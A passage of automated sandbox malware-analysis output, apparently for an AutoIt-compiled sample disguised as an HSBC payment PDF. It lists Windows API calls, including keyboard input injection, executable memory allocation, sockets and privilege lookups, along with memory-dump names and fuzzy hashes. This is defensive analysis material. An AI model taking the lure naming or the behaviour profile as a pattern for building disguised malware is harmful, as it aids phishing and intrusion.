• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
• MessageBeep.USER32(00000000), ref: 0045C226
• KillTimer.USER32(?,0000040A), ref: 0045C242
• EndDialog.USER32(?,00000001), ref: 0045C25C
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• EndPath.GDI32(?), ref: 004013BF
• StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
• SelectObject.GDI32(?,00000000), ref: 004013EE
• DeleteObject.GDI32 ref: 00401401
• StrokePath.GDI32(?), ref: 0040141C
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
• __swprintf.LIBCMT ref: 00412ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456
                                                                                                                                                    APIs
                                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                    • String ID: AutoIt3GUI$Container$%I
                                                                                                                                                    • API String ID: 3565006973-4251005282
                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                                                                                      • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: 3cA$_A
                                                                                                                                                    • API String ID: 4104443479-3480954128
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                    • String ID: Listbox
                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                                    • String ID: K$@BL
                                                                                                                                                    • API String ID: 3494438863-2209178351
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                    • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                    • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                                                                                    • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                    • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                    • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                    • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                                                                                    • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                    • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                    • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                    • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                                                                                    • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                    • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                                    • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                    • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                                                                                    • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                    • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                    • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                                                                                    • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                    • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                                                                                      • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                                                                                    • _memmove.LIBCMT ref: 0047E314
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3659485706-0
                                                                                                                                                    • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                    • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                                                                                    • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                    • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                                                                                    • CoUninitialize.OLE32 ref: 004780CE
                                                                                                                                                      • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 780911581-0
                                                                                                                                                    • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                    • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                                                                                    • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                    • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2808897238-0
                                                                                                                                                    • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                    • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                                                                                    • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                    • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2214342067-0
                                                                                                                                                    • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                    • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                                                                                    • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                    • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                                                                                    APIs
                                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                                                                                    • _strlen.LIBCMT ref: 004764D9
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                    • Opcode ID: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                    • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                                                                                    • Opcode Fuzzy Hash: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                    • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                    • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                                                                                    • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                    • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                    • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                    • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                                                                                    • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                    • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
• SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
• __isleadbyte_l.LIBCMT ref: 00436229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 00484F02
  • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
  • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
  • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
• GetCaretPos.USER32(?), ref: 00484F13
• ClientToScreen.USER32(00000000,?), ref: 00484F4E
• GetForegroundWindow.USER32 ref: 00484F54
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• GetCursorPos.USER32(?), ref: 0048C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
• GetCursorPos.USER32(?), ref: 0048C534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
  • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
  • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
  • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
• _memcmp.LIBCMT ref: 004586C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
• HeapFree.KERNEL32(00000000), ref: 00458703
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
APIs
• __setmode.LIBCMT ref: 004209AE
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
• _fprintf.LIBCMT ref: 004209E5
